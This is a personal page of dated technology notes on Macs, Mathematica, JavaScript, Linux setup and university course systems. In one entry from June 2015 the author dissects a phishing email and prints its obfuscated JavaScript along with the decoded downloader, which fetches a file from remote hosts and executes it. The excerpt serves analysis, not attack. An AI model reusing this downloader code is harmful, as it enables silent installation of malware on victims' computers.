Technology related projects

Techdemo, 2012. 3D printing, 2012 Graph project, 2011 Structure from Motion, 2009,2007 Geodesics, 2009,2008 Flash PITF, 2004 Sofia AI project 2003/2004 CCP 2001 I,II

Technology notes 2011-2015, 2007-2010, 2011-2015, 2016, Now

18-12-2015: . The new Apple magic keyboards are fantastic. The best keyboard I have ever worked on. I hated the old apple bluetooth keyboards which would disconnect easily or have the batteries die. Now, I don't have to buy overprized used USB apple keyboards any more. The new magic keyboards have a lightening connection which can be hard wired, allowing constant USB connection. This is unproblematic and reliable now also with linux. Having one type of keyboard only for all machines allows to work a notch faster.
10-12-2015: To test out the new Apple stylus on the iPad pro, here are some sketches. I used to do all writing and sketching with the finger, got for some months the Adonit Jot mini. What really is nice with the apple stylus that it feels like a usual stylus, that with suitable apps, one does not have to worry at all about touching the screen. The screen now becomes like paper, the finger and palm touches are completely ignored. It feels now almost like writing on paper. For reading text (I have lots of scanned PDF books), the ipad pro is much better. The text has now the clarity of a real text. The fact that the stilus can be charged by sticking it into the ipad is nice, but having it stuck there makes it very vulnerable for breaking off. Its a 100 dollar pen!
22-11-2015: Some experiments of Jonah Wagner, a Swiss software developer: fluidwebgl by 29a.ch, neonflames by 29a.ch, webglice by 29a.ch or chaotic particles by 29a.ch.
08-11-2015: The possibilites to look or ask things online today are exploding: Slader, Homework sharing website, Quora for asking questions, Calcchat for study guides, for Integer sequences, Stack exchange with Stackoverflow for programming, Stack exchange for math, definite integrals, Wolfram alpha and of course Wikipedia. Its getting harder and harder today to avoid information overflow.
24-10-2015: Youtube starts to crack down more on copy right content. The reason is the introduction of "youtube red" which required google to renegotiate content with producers. They certainly have the right to do so, but it raises concerns that even smaller copy right issues which pass today will in future be banned. Moral of the story: keep the master files (I deleted much of mine since final cut keeps such large files).
23-10-2015: While Mimic is funny, there is a serious side. I use demononizer since more than a decade (practically in any script which processes content from a website) as Microsoft has in their "time of evil" completely ruined things. We have got used to it, but it still happens to me regularly that a string formatted of Microsoft (or Adobe) origin (especially " or - symbols) ruined a program from running. There is nothing more frustrating than to have two texts which look identical in the editor, where one works, the other not and where only watching the file with a binhex editor reveals the hidden difference.
02-10-2015: Update to El Capitain in OS X. Everything smooth. Except more nagging about using the cloud. And again scroll bars disappearing. Small things but tests the nerves.
20-09-2015: Everybody talks about moving their stuff to centralized server farms (aka "cloud" in marketing buzz). Its part of globalization culture and a game theoretical equilibrium even so every centralization and monoculture increases global risk. Just a glimpse what could happen if a big data provider like Amazon goes blank for a while can be seen at the "Cloudopocalyse" or data breaches, security, Medical records, breaches. What happens if the majority of businesses have outsourced their data to big brother? The problem is that if a substantial part of businesses are shut down in the same time, there is a risk of a global economic meltdown similarly when big banks fail.
18-07-2015: game of life in javascript. A cruel moment while writing because I thought first that one can copy variables C = c.getImageData(0,0,l,l); C1=C; It almost works in javascript but C1 is actually a pointer to the same memory block. One has to allocate an independent second image data memory block. The problem (and the reason for a three hour agony of finding the mistake in the program) was that it almost worked. It looked like life, only that the gliders did not evolve correctly. One could avoid allocating a second block of memory but that would make the program larger as one has to keep a memory block while doing the update. Making the program smaller does not make it faster. When building a third loop for example over the color fibre, the program slows down considerably.
16-07-2015: Tests with image manipulation. I begin to dig the way Javascript can deal with pictures: A blur example. A cellular automaton. The example here is mathematically interesting as any figure will converge to a rectangle and the color pattern inside will have interesting random patterns. translation and life.
15-07-2015: Javascript implementation of the double pendulum, one of my favorate systems as the ergodic behavior of this system is still completely in the fog. A bit surprised, how fast a Javascript implementation of Chirikov is. Can compete with the Java implementation. It of course can not compete with C implementation. Javascript is great because it is going to stay unlike plugin based technologies like Flash or Java.
14-07-2015: Live from Northwest building B103, Townhall meeting about the new student information system: the Course Catalog is one of the most important information a university can provide. In the last decade, this information has been made available in a simple, accessible and timely manner by the registrar. We only learn now how important it was, when it was taken from us. The current search catalog is incomplete, erratic and misleading. Search has three fundamental problems: it is biased, It is erratic and it is unverifiable. An announced API has the same problem: it is impossible to verify whether the information is correct. An example of bias is the alphabet: some courses just come first because they appear first alphabetically. Filters produce a gamble. During the presentation, it was announced, that some selected students had been asked to find specific courses on the catalog. There was no mentioning whether somebody found anything but there were prizes at least! Well deserved. A good treasure hunt question would have been "Find mathematics courses!" As screen shots show, it is not easy. How big is the catalogue? We got a database dump of the math department courses: a 70K text file. There is much more convoluted Javascript on the new search system. Just dump the catalog files on the web for each department and the search problem is solved.
10-07-2015: The course catalog of a university is one of the most important information sources. Unfortunately, the current search only interface is equipped with complicated filters which is unable even to split individual departments. Compare with the excellent and extreme clarity of static pages provided in the past. Currently, when search for math, math courses don't appear. But there is a Bioelectomagnetic course on the first page. Why is "search only catalog" a huge problem?

  1. Search is always biased. (for example by alphabet, by filters, by preferences)
  2. Nobody looks beyond the first few pages (this is a problem if one comes behind)
  3. Search is hard to interface (Its impossible to scrape the information)
  4. Search is not verifiable (different querys give different search results)
  5. Search is complicated (especially if many filters are in place)
  6. Search is not auditable (does the database forgot something?)
19-06-2015: Just looked more carefully in one of the many js-email malware. Script kiddie stuff as appearing on github. The text is Notice to Appear, You have to appear in the Court .... Kind regards, Mario Stein, District Clerk.. Contains a zip file with obfuscated js code like: var stroke="55...11"; function a207() { return 'd="+s'; }; function a39() { return '{ '; }; function a197() { return 'tp:'; }; .... for (var hn=1; hn<=236; hn++) { gn += this['a'+hn](); } this[a0()](gn); When decoded, it becomes function dl(fr) { var b = "h....com d....com t...com".split(" "); for (var i=0; i 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open("GET","http://"+b[i]+"/document.php?rnd="+fr+"&id="+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; } }; dl(5951); dl(1802); dl(543); obviously trying to boost some companies. It illustrates how low the SEO optimization industry has sunk. The code would would probably run only on internet explorer with activeX enabled. Idiotic attempts which still seem to work it seems.
19-06-2015: A strange treshold behavior in Mathematica: Simplify[(1 - x^7)/(1 - x)] gives 1 + x + x^2 + x^3 + x^4 + x^5 + x^6 While Simplify[(1 - x^8)/(1 - x)] does not give the sum any more. One can push it one notch higher with Simplify[Expand[(1 - x^9)/(1 - x)]] which gives 1 + x + x^2 + x^3 + x^4 + x^5 + x^6 + x^7 + x^8 but Simplify[Expand[(1 - x^10)/(1 - x)]] refuses to give the sum any more. Instead of a Series expansion, here is an elegant way: f=Expand[Factor[(1 - x^20)/(1 - x)]] Why is this interesting for me: because polynomials represent graphs as used in this construction. The graph to 1+x+x^2+x^3+x^4 for example is the graph K_5. Picture of K40. More interesting are cases like (1-x)(1-x^2)(1-x^3)...(1-x^n) whose expansion starts with 1 - x - x^2 + x^5 + x^7 - x^12 - x^15 ... and is subject of the Euler Pentagonal theorem. I had discovered the theorem in the theory of partitions in a project done during highschool but had no series expansion techniques to prove this then. Here is the graph belonging to the above polynomial with n=21.
18-06-2015: Search is not easy and more importantly is almost impossible to audit. Despite an abundance of good search engines, is still an unsolved (maybe unsolvable) problem to get both comprehensive, relevant and results which the user can verify to be complete. While the order in which results are presented are often computed quite well with democratic page rank methods, it leaves the user unsure whether the results are really fair or whether there is some bias. The search bubble problem as well as the not always impeccable taste of crowds and the social networks effect can distort reality. Companies like Google are under heavy attack in Europe as they accused of distorting search results, phenomena like google bombs" or "Colbert" or "4 chan" stunts illustrate how popularity votes can be gamed and manipulated quite easily. Manipulations through SEO have become less efficient recently thanks to the search engines becoming smarter, but one has not yet learned how to deal with social network search distortions, distortions by individualized search or how to detect manipulations by the search engine itself. The actions against SEO methods for example make the search less transparent. In a complicated search algorithm, it is today almost impossible to detect whether bias was injected by the search tool itself. The problem becomes apparent also when building small search interfaces for catalogs, like on online stores like Amazon or in course search tools at universities. This is why for basic things like course catalogs a browsing alternative is important which does not involve search. A browsable catalog is auditable as faculty for example can see whether their course is there and staff can use it to plan. Search might lead to a course in some way but not in an other. How can one verify that a department course is listed when students search it? How can one find out, where the listings occur? With a searchable catalog this is not possible and all searchable catalogs seen so far have catastrophic shortcomings. Even when the best programmers do it.
17-05-2015: To see how strong the GTX 970 graphics card is, tried out GTA 5 on my home thinkmate workstation. (I installed a fresh windows 7 temporarily on a separate 250 Gig SSD, but could not install the game from the CDs and had to download from social club. The entire windows and game installation had to be repeated because windows 7 became unbootable and unrepairable with a mix of all the graphics card, 4K monitor and windows updates. (seems like a lot of time, but of course, I do things in parallel on other machines while the updates and installations are done). The second time, I refused all window updates and things went through fine. Since I only use this temporarily and for that game, I don't need updates). The graphics is gorgeous. Articles like here mention the need for more graphics cards. The game works in full 4K with 50+ Hz frame rate quite well with a single graphics card (there are situations where the frame rate drops and two cards definitely would help). But a special driver by NVIDIA which was just released a month ago, just for that game, seems have done the job even so I'm only on one graphics card. The details of the graphics is amazing. The game industry seems almost on par with the movie industry, little details like a cat running through the scene or books on a table of the psychiatrist Isiah Friedlander look almost real. Besides wanting to touch Windows only with a yard stick there was an other reason to install and try out everything on a different physically harddrive which physically needs to be detached: these games can become addictive, similar than math problems, they suck you in. It happened twice Once at Caltech, I was playing MYST for about 3 weeks, about 15 years ago, I ran Crossover on my linux box and played Wolfenstein over a summer. Just looked again: Crossover has not worked on GTA 5 yet. Fortunately, I would not want to have it to be so easy to switch. Currently, I need to physically swap the SSD to play it.
16-05-2015: Spilled Starbucks coffee over my mac air. Right on the back of the keyboard and bottom of the screen. It must have been a mouthful which directly went into the guts of the laptop and on the top part of the keyboard. It immediately went dead. I tried to dry, at some point even with the hair drier which on-line guides don't recommend as it might heat up parts too much and bombard the inside with burned dust. Whenever the lid would open, the battery part on the bottom would get hot. It was obviously a short circuit. To prevent overheating, I put it into the freezer which is problematic due to condensation but it might have saved it to keep cool until the battery was empty. According to the book, the next thing would be to wait 48 hours until everything has dried. But I needed some files. So, I placed the laptop lid open over a large windows fan, and let it vent over night. This must have done the job and dried out everything. After a recharge, the laptop booted up fine again this morning.
12-05-2015: Not so much about technology, but about memory access in the brain: here are two observations about memory: for gym locker numbers, I seem to have associated a fixed allocated register. If I learn a new locker number, the old one gets lost almost immediately. It happened that I had to buy a new lock because the old one seemed lost but then it reappeared in a corner of the backback, I was unable to get the old one opened as the new code had overwritten it. A similar thing happens to me with home telephone numbers. I don't recall old home telephone numbers, there seems again be fixed memory block allocated to that information. Quite efficient. An other interesting observation is that some of my memory parts are visual. This morning, I got to a bank ATM, where the number pad was reversed (there is an annoying inconsistency with calculator pads where the 1 bottom-left and telephone pads where the 1 is top left, but the ATM had the calculator order and not the telephone order). What happened was that when exposed to a reversed pad, I could not remember the pin at first. I had to type it on a usual pad to recover it. It appears that the pin is stored in my memory as a geometric figure rather than as a sequence of numbers. When learning piano pieces by heart, I seemed also have the pieces stored geometrically as I would have to play the piece to get the sequence of notes. The piece seemed have been stored in the fingers.
08-05-2015: I wanted to see how powerful the new graphics GTX 970 is with games. But installing windows 7 on a fresh SSD was like going 20 years back. I don't think even having had in Linux such problems and I'm using the later since 19 years. The only hack, which worked (after about 5 attempts), to get a fresh windows 7 onto a new Samsung SSD, was copying the CD to the hard drive, then install from there. Otherwise, the installer would simply refuse to do it. Here is the procedure. Networking, or the Samsung monitor of course does not work without drivers. I also needed to shuffle forth and back of tools and drivers because a fresh windows has no drivers at all, can not access internet, can not use the monitor properly. Even the very first linux systems which came on floppies were better in this respect.
03-05-2015: I use for a first time a 4K display in linux. Its a beautiful 3840x2160 pixels Samsung U28D590 monitor and a decent GTX 970 graphics card. Both with HDMI and DFP-2, I get 60 Hz with 3840x2160 pixels. The monitor is not only more energy efficient than the old, it is also twice as thin and half the weight and looks good. The configuration had been initiated with the NVIDIA tool. A screenshot (PNG, 3840x2160 pixels) shows that while the display is crystal sharp, the fonts are too small. Since I use good old blackbox and xterms, I will have to adapt things myself. I usually call xterm with a shell program. Something like `/usr/bin/xterm +cm -sb -bg black -cr yellow -hc red -fg white -fa 'Monospace' -fs 12` This allows to fix the default font size.
16-04-2015: Just got the new MacBook from the Cambridge Apple store. I had ordered it the night it came out and like the look and feel. I still had wished to get a 1T HD version as my other 500 G laptop is full (have to clean out all the final cut stuff). The longer battery life, the better sound, the wonderful keyboard will be appreciated however as well as the better screen resolution and the smaller size. I changed my mind about the new USB C port. I got one adapter which does video, power and classical USB and that will do the job. There is no need to have the clutter at the machine. It is an opportunity for adapter builders to build a small USB-C adapter which like a swiss army knife can morph to anything. There is only the thunderbolt adapter missing for now. It is the future to have only one type of cable for everything. Update (4/17/15): Its a nice machine but its only half the joy if one can not show it off! Here are pictures (click for the large pictures)
26-03-2015: A buffon needle animation Javascript. Also this is executed in the browser, is open source, has no libraries and consists only of a few lines. Older ipads skip some frames
20-03-2015: Experimented with the graph data base neo4j. Pretty cool, as graphs are very natural and general structures. I believe that I myself started to really "think" in graph structures when starting to use Unix as I like to organize knowledge in knowledge trees (mind maps). Graph databases are in some sense equivalent to relational databases as one can organize graphs using adjacency matrices (tables), but they appear more flexible as often, only small part of a a table is needed. Neo4j was extremly fast to get started with. The only problem with neo4j is the large footprint (it is written in Java). I had it running for about a week and my linux box started to get slower. Huge memory footprints also if Mathematica calls java. In the later case, some java processes still survive after mathematica is done.
10-03-2015: Its amazing that javascript animations written 15 years ago still work without modifications. At that time, no canvas was available yet. For the Pi-day 2015, I wrote a little animation for the pi curlicue (I'm interested in curlicues as they are Birkhoff sums). Here is the golden mean curlicue animated with 12 lines of Javascript. No external libraries. This will continue to run without modifications in 20 years, on any device.
08-03-2015: I had hoped for 1TB options and 16 G memory options for the new Macbook. Seems not in the works. I wonder how the new single connection will work out. I loved the MagSafe connector and see trouble with an overused single connector (my thunderbolt adapter wears out since it is used for display as well as backup). How will it work for presentations, where you want to have a USB wireless mouse, an external display adapter and possibly a load a presentation from a USB key? Additionally, the new macbook has a slower M processor (drawing less power instead and avoiding a fan).
06-03-2015: Some keynote presentations from 2008 do no more open under the newest keynote. Fortunately, I have kept an old version of keynote2009. Annoying that after the conversion, the default is again to use keynote 2009 requiring a reconfiguration. Apple should add an importer for old formats. I like however how keynote keeps media and data in a separate folder. Like this it is still possible to reconstruct some of the slides. But as presentations are a short lived thing which should not be recycled too much, losing some old stuff is not that terrible. More troublesome is to lose text documents. Having experienced this once as the Moser script was written with a proprietary text editor first. This had required to rewrite everything from scratch as even the emulators were no more able to run the software.
20-02-2015: We live in a time with an amazing variety of teaching possibilities. The blackboard is one of the oldest tools. Here is a recording done on my `home blackboard". While it has ancient origins, the modern blackboard seems to have emerged only in 1801, when James Pillans used a large piece of slate on the classroom wall, and in the US first been used at Westpoint. Since the 60ies, the greenboard became popular. It has less contrast and are usually portable and of inferior quality (at Harvard, there are some in SC Hall E on the side). What is nice about the blackboard: 1) It always works. 2) There is no technology distraction. 3) It naturally slows down the speaker 4) If magnetic, one can do experiments on them. 5) It is effective: 5 years ago, I had spent some time doing this presentation. It required to make the slides, to record, which all needed maybe 4 hours. The blackboard lecture was done in one take (30 minutes) then to transfer to the computer and annotate which is an other hour. An already mentioned Slate article about it. Since the 90ies we see more and more also white boards. Cited reasons are the lack of dust and the ease of writing. But the markers actually produce a lot of dust (if they work) and breathing this chemicals is hardly healthier than chalk. Similarly as with overhead projectors, I have still to see a teacher who can write nicely on white boards (one tends to write sloppily and too small). Similarly like fountain pens make you write more neatly than with ball pens, blackboards naturally force you to write slower and more precisely (at least for most people), the smallness of writing can still be a problem. Dry markers also can not be erased well: I had once at a conference in Vienna been forced to use a white board where the markers were dry. I had to give the talk without board. White boards appear cheaper but one has to buy a lot of markers and replace the boards frequently as they scratch easily.
05-02-2015: Content management systems for course websites have become complicated beasts. This is unavoidable, as one wants to cover a lot of different features in communication, content delivery or administration. Currently, FAS and extension school start implementing Canvas a learning management system replacing iSites. Used already by more than 1000 colleges, it will eventually replace iSites, which was built locally and has become pretty good over the more than 10 years it is in place. As currently we can use still both, its good to compare. I have only started to use it. Just a few general thoughts:
  • Using an external company instead of a house maintained system is a part of a common trend of outsourcing IT to external companies. In a time of globalization, this might be unavoidable and natural. As everybody starts doing that, there is maybe no other choice. It will be interesting to see in the long term what it means to destroy a local IT culture, to be dependent on an external company who could change their policies and prizes once it has become a dominant player. There are similar considerations when using other external tools like cloud services, which are still in the ``buy in" phase of acquiring critical mass, destroying local IT culture and knowledge. Once hooked, the companies can increase their prizes and policies. Already now, many small businesses or private folks have outsourced their IT. Yes it is convenient, but one has to see the drawbacks like disappearing jobs (large companies tend to send jobs to countries with lower salaries), more risks (already today, if a major cloud provider would melt down, it might be similarly as with banks a risk for global economy) or the loss of control who can see the data (data can be read by third parties).
  • Canvas looks already quite stable. Helas, it has already invasive features which remind of the games other big players play like Microsoft, Apple or Facebook. It tries to lock you in, to absorb you into the system, not letting you out. This can be aggravating, especially if it starts to mess with your usual work flow. The by far most annoying example is that all communication goes through the Canvas company. The system even refuses to reveal the email addresses of students. There are lots of folks who complain about this as it does not make sense to be so secretive except to lock you into the system. (Currently there are still other administrative services which allow to get access to the emails but this might change). What does it mean for a teacher using the system? All communication with students through canvas is recorded for eternity. That is not such a big deal as most email communications go through some external company like google, yahoo etc. What Canvas does with these emails is not clear. What is more problematic is that the system wants you to log into the canvas page in order to actually communicate. This is cumbersome: you have to log into the system, navigate to the communication part, then use their massive and complicated email messaging system (a large system which needs to cover many different needs, is always complicated, one has to go through about 10 steps to send a simple email, with a usual email client, it is 2 or 3). But the worst part is that it messes with your work flow, the use of your own email client you are used to. Alternatively, it is a bit like a black box: one has no idea what actually happened with the email. With a standard email you at least get a feedback message if the email is undeliverable etc.
  • My biggest worries are about long time archival, the movability and accessibility of content. This is a common problem with content management systems as they are database driven and the database is not accessible, not even for the user or customer. Many education content management systems are not globally accessible. iSites has the feature that all old pages and content is still available and movable. Weak part of iSites was that the URLs were terribly long and cryptic, that the content was seldom searchable as it was mostly outside the usual search engines and internal search features are always unusable (we have been spoiled by companies like google who made search easy). An other annoying feature of iSites had been that it was difficult to archive content and move it elsewhere (spider software is strictly excluded). So, as a teacher, any content you create is essentially content you might lose control over in the long term. As education becomes more and more an industry, it will be interesting to see whether academia will remain in charge of content or whether there will be a time when knowledge is treated more and more like a commodity and sold and controlled by the highest bidder. Having seen all the developments (I use the web for teaching in higher education since 1993), I have also seen many great companies grow, disappear, change their nature or being absorbed in larger structures. And when looking back to the history of education, there were entire eons, where education was less open and free than it is today. There is no reason why openness and freedom have to stay. It will be interesting to see how the "centralization of education" will work out. The worst case scenario is that the role of universities will diminish. We start to sell out to private companies, saving money over the short term but making ourselves redundant. We have seen models, where education was dominated by church (Galileo felt that), times where it was funded and promoted by governments (Euler worked at the Russian academy of sciences) or military (the Manhattan project employed temporarily many stellar scientists), times where some oligarchies or monarchies dominated education (Descartes was a private tutor to Queen Christine). Now we sell out to companies who listen to share holders and stock prizes and who become global players, serving thousands of universities. Providing "software as a service" is only a step away from providing "education as a service". But the euphemism "as a service" is a synonym for "outsourced".
  • In the short term, the most annoying feature of Canvas is being "spammed" with messages. I don't mind being spammed by real people sending me messages, even if they do frequently and the message contains new information. I mind being spammed by bots. Bots are already everywhere: Facebook, Linkedin, Twitter, news website, companies you are a customer, they all send regularly automated messages. Now, Canvas has this annoying feature that it sends regular reminders about things. No other education content management system did so, so far, as this is also the first time, we use a system built by an external company which needs to make profit. What is the effect? Of course, you start to ignore all these reminders. In an educational system it is a disaster if one can no more distinguish between important messages sending announcements which contain vital information by teaching staff or automated messages sent by the system. This is also annoying on the phone, there are now regularly phone calls done by bots, in particular done by political parties which somehow get around the ban to use the phone as an advertising machine. In social media, we are well aware already that we are the "product" It just feels weird to see that in education, more and more, not only students but teachers and entire universities have become "the product".
03-01-2014: My favorate note taking app (Penultimate) has been trashed. The new version is a disaster: 1) starting up the app does not continue at the old place. 2) no notetaking possible without going through Evernote servers 3) page flipping is complicated. Unstable (if missing one finger, one writes on the screen) 4) interface too complicated. Too many steps. Changing color and pen could be done in one step 5) one can no more email notes. Everything you do is swallowed and owned by Evernote. 6) Importing from drop box possible but no export.
16-12-2014: It had been a bit of a pain to render the pictures in this gallery with the older Mathematica 10.0 version as the program had been very unstable, espcially when run in batch mode. I had to write scripts which would between each picture wait a few seconds, kill any mathematica or java process, then continue, as any running processes would make further computations impossible. Now, with Mathematica 10.0.2, the stability is back. That was really important.
26-10-2014: A Heise article mentions trouble of Mathematica with determinants. The notebook authored by Antonio J. Duran, Mario Perez und Juan L. Varona deals with an applied problem. Maybe unrelated is an inconsistency with accuracy, when dealing with determinants. Mathematica usually does well in similar situations if no algebraic equations need to be solved and compute with arbitrary high precision. Determinants should not be different as it is just an algebraic expression of the matrix entries. Here is an example with matrix computation:
 $MaxPrecision = Infinity; $MaxExtraPrecision = 10000000;  
A=Table[3^(i*j)/2^(i-j),{i,30},{j,30}]; A1=1.0*A;
A1=Table[3.^(i*j)/2^(i-j),{i,30},{j,30}]; A1=1.0*A;
B=MatrixPower[A,1000]; U=B[[3,3]]; N[U,100]
B1=MatrixPower[A1,1000]; U1=B[[3,3]]; N[U1,100]
This is fine even after computing A1000. You can check for example that even after 20'000 digits, the results agree. When determinants are involved this is no more the case:
 U=Det[A]; N[U] 
V=Det[A1]; N[V]
The first gives 9.86167 . 104503 while the second one gives -4.95199415. 105945. One remedy is to by hand add more zeros after the 1. like here
 $MaxPrecision = Infinity; $MaxExtraPrecision = 10000000;
F[n_] := Module[{}, A = Table[3^(i*j)/2^(i - j), {i, n}, {j, n}];
A1 = 1.00000000000000000000000*A;
N[Det[A], 1000] - N[Det[A1], 1000]];
Table[F[k], {k, 1, 30}]
The user needs to add by hand more zeros even so the system was told to compute with higher precision. This reminds of the true story of a teacher marking the answer 3. * 4. = 12 as wrong because writing 3. indicates that one only should give the answer up to one digit. The right answer in the exam was supposed to be 3. * 4. = 10. One can certainly justify this, but it is narrow minded pedantry. What does the user have to do to force the higher accuracy in Mathematica? One needs to add a fake 1 number as above with 1.00000000000000000000000 which triggers to do the computation with higher accuracy.
22-10-2014: Photo math, a glimpse on what we have to expect in future. Imagine the phone chip implanted in the head and grabbing pictures from the eye. Could be great assistance in math tests.
16-10-2014: Yosemite runs without flaw so far on my imac and mac book air. I'm not sure whether I like the font change. Everything looks flatter. The buttons on windows look too blurry, also the harddrive icons are just blobs of color. All icons in general look as if they have gone through a "water color" photoshop filter. Even the menu entries look blurry (Helvetica fonts). When checking the "dark menu bar and Dock it can look decent however. In general the OS feels a bit more responsive. A substantial change again on how Keynote stores the presentation. It is again a single file and no more a folder. As I also sync presentations. if a presentation is changed, the entire multi-Gig Presentation file is synced and not only the changes. I had liked the unzipped version but obviously they needed a single file for transfer between devices.
15-10-2014: A nice piece about the blackboard. I agree: blackboards always work, forces to write in a readable way (for most at least). Since my undergraduate course assistant time, I had also to teach on white boards. The pens often dry out. The erasing does not work without heavy chemicals. One tends to write too small and sloppy. The boards are too small.
14-10-2014: Heartbleed, Shellshock and now Poodle. Names have effect and affect. And as the choice of operating systems is emotional and business attached, one can only suspect that there is also a lot of propaganda involved in hyping these vulnerabilities by giving them catchy names Like the Rumpelstiltskin syndrome in medicine. Real risks of previous or existing zero day vulnerabilityies are much bigger. No wonder "Poodle" does not bite as much as "Heartbleed" or "Shellshock", The name HIV had less effect than Aids, H1N1 was feared only after being called Swine flue. If Poodle would have remained CVE-2014-3566, nobody would have even noticed its bark. Every major operating system or complex program regularly will need updates and patches. Examples: Windows or Linux cases. US-Cert keeps track in general.
06-10-2014: We were experimenting with Mathematica solving some PDE's in multivariable calculus. An interesting issue came up: on different platforms, different answers appeared: For the following code solving the wave equation in one dimensions, we either got the value -0.250029 or -0.249797. f[x_] := Sin[Pi 7 x]; g[x_] := 5 Sin[5 Pi x];
U = NDSolveValue[{D[u[t, x], {t, 2}] - D[u[t, x], {x, 2}] == 0,
u[0, x] == f[x], Derivative[1, 0][u][0, x] == g[x],
DirichletCondition[u[t, x] == f[0], x == 0],
DirichletCondition[u[t, x] == f[1], x == 1]},
u, {t, 0, 1}, {x, 0, 1}]; U[0.4,0.3]
OSX screenshot, Linux screenshot. October 10: Technical support tells: "The results appear to be within the default PrecisionGoal. A function like NDSolveValue will generally return a result that is correct to many digits of precision, but for PDEs, the default PrecisionGoal is actually not very high (~4 or so). So for numerically difficult problems, you might not actually get very many good digits with default option settings, which is basically what appears to be happening here. Increasing the PrecisionGoal causes NDSolveValue to return the same result across all operating systems." Still interesting that this happens for a linear PDE which is completely solvable. I would have expected sensitive dependence on initial conditions (CPU dependence) only to occur for more complicated nonlinear systems.
19-09-2014: Tweet a program by Wolfram is a great thing as Mathematica allows for very short code snippets. I had tried some tweets earlier here in the dynamical systems lecture or this tweet in a linear algebra result or for a multivariable class. See the Tweet.
17-09-2014: Installed OS 8 on iphone. A scare: the phone requires now password protection and the password does not have to be ascending, nor contains multiple digits. After booting up the first time, the user is not told that and the old password does not work any more. I first thought to be locked out forever as my favourate phone password included multiple digits or simple ascending or decending sequences I can enter quickly.
14-09-2014: About the MOOC revolution. Like any technology, it is going to stay in the mix of education. It actually has been there for a long time already. I followed already as a teen TV courses in physics, which were essentially MOOCS distributed by TV and which came with textbooks and exercises. Modern MOOCS are actually quite close to this old fashioned TV instruction. They just make use of new peer and web technology similarly as "the cloud" is a modern incarnation of the good old "mainframe computers" but with new technology. The article mentions the problem with engagement. An other problem is authenticity. Like an old TV show, a year-old Youtube video, a pre-recorded, a shelved lecture is hardly exciting. There is a life time for everything. For good textbooks like Feynmann's lectures, the shelf-year can be several dozen years. Good pre-recorded lectures of TED-quality can still be viewable for a couple of years. But the shelf-life of a prerecorded lecture by an average university teacher is much shorter. Would I want to listen to a lecture given in 2010? Heaven forbid, except if it is a historical lecture or given by somebody who has a name recognition (and then the interest is mainly in the person and not the subject). Cold coffee is poison for learners!
01-09-2014: I love Ubuntu, but it can sometimes be frustrating. Example: one needs to jump through some hoops to install standard programs like Acrobat or Google earth. For google earth for example, one needs to install the 32 bit version. I tried for hours to get the 64 bit version to work (using help from stackoverflow but with no success. Only the 32 bit version works and it needs the following temporary software repository change: sudo apt-get install libc6:i386 sudo -i cd /etc/apt/sources.list.d echo "deb http://archive.ubuntu.com/ubuntu/ raring main restricted universe multiverse" >ia32-libs-raring.list apt-get update apt-get install ia32-libs rm /etc/apt/sources.list.d/ia32-libs-raring.list apt-get update sudo apt-get install gcc-multilib Later, I found an easier way here:
 wget http://dl.google.com/earth/client/current/GoogleEarthLinux.bin  
 chmod +x GoogleEarthLinux.bin  
 ./GoogleEarthLinux.bin 
Acrobat does not even mention linux versions anymore. Yes, there are alternatives like xpdf but this lacks features like double page view. Fortunately, "evince" finally has become stable enough. Still needed is a built-in PDF viewer with the power of "Preview" in OS X, which allows to rotate and copy paste pages, shuffle or crop pages. There is a decent free Master PDF editor: from here which can be installed quickly using wget http://code-industry.net/public/master-pdf-editor_1.9.25_amd64.deb sudo dpkg -i master-pdf-editor_1.9.25_amd64.deb
03-08-2014: Mathematica 10 has a nice new feature, allowing to integrate over geometric figures. Funny that the documentation indicates that the result is 4Pi/3 for Integrate[1,{x,y,z} \[Element] Sphere[]], even so the correct command is Integrate[1,{x,y,z} \[Element] Ball[]] Obviously this was only fixed after the documentation was written. The sphere result gives correctly the surface area of the sphere. [Update, shortly after, the documentation has been corrected.]
13-07-2014: Upgraded some machines to Mathematica 10 already. I was a bit concerned about my large graph theory library (8000 lines of very density programmed code). There was only one incompatibility: Mathematica 10 has now the ChromaticPolynomial back (which before had to be hacked from the Combinatorica package in an ugly way: since Combinatorica was incompatible with almost everything, I had to let Mathematica write a fresh Mathematica program, run it to evaluate ChromaticPolynomial and read the result back. Fortunately, this hack is no more needed any more). There are quite a few new functions also in graph theory. With one of them, I already managed to crash mathematica (on a Macbook air). One has now for example embedding options in 4 dimensions "GraphEmbedding[HypercubeGraph[5],"SpringEmbedding",5]". For Calculus courses, it will be nice to use transformations like G=FunctionRange[{{x-y,x^2-y^2},x^8+y^8<1},{x,y},{u,v}];RegionPlot[G,{u,-2,2},{v,-2,2}] Also Regionplot in 3D has become better like RegionPlot3D[x^4*y^2-z^2+x^2*y^2<0,{x,-3,3},{y,-3,3},{z,-3,3}] As we are just covering Lagrange next week in the summer school course, also some news ArgMin[x^2 - x y^2,{x,y} \[Element] Disk[]] or ArgMax[x^2+2y^2+z^2, {x,y,z} \[Element] Sphere[]] to find the maximum of a function on a geometric object. Here is something just relevant in our first midterm exam: A=Line[{{0,0,0},{1,1,1}}];B=Line[{{3,2,4},{2,4,2}}]; ArgMax[EuclideanDistance[x,y],{x\[Element] A,y \[Element] B}] Next week, we will start also with integration. Also here, some cool new stuff: Integrate[x^2+y^2,{x,y,z} \[Element] Sphere[]] computes the moment of inertia of the sphere. Note that this is different than the moment of inertia of the unit ball, which is computed with Integrate[x^2+y^2,{x,y,z} \[Element] Ball[]] We can also place the ball at some other place and change the radius: Integrate[x^2+y^2,{x,y,z} \[Element] Ball[{4,1,3},2]] And here is the volume of a tetrahedron given by four points: Integrate[1,{x,y,z} \[Element] Tetrahedron[{{1,1,1},{2,2,2},{6,3,3},{3,1,2}}]] A great tool to write new integration problems! There are various other things like MandelbrotSetPlot[{0.3I,0.3+I}] plotting the Mandelbrot set in a rectangle given by 2 complex numbers or JuliaSetPlot[-1.2]. A bit creepy is the command GeoGraphics[GeoMarker[],GeoRange -> Quantity[100, "Meters"]] which plots a map, on where you are.
